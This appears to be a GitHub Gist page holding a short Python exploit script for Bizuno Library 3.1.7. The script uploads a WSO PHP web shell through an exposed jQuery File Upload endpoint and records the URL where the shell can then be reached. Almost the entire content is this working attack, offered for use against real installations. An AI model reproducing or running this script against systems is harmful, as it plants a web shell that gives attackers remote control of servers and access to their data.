Created
May 18, 2020 19:03
-
-
Save islanddog/86a78eaa7d036c313d6c3d73c75b94e4 to your computer and use it in GitHub Desktop.
Bizuno Library 3.1.7 - JQuery File Upload Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import requests | |
# Host IP http://IP | |
host='Put IP HERE' | |
# JQuery path for Bizuno Library 3.1.7 | |
url=host+'/Books/apps/jquery-file-upload/server/php/index.php' | |
# Uploading the shell to the server. I use wso-4.2.5.php in this example: | |
files = {'files': open('wso-4.2.5.php', 'rb')} | |
r = requests.post(url, files=files) | |
# Location of Shell/Name - wso.php | |
shellloc=host+'/Books/apps/jquery-file-upload/server/php/files/wso.php' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment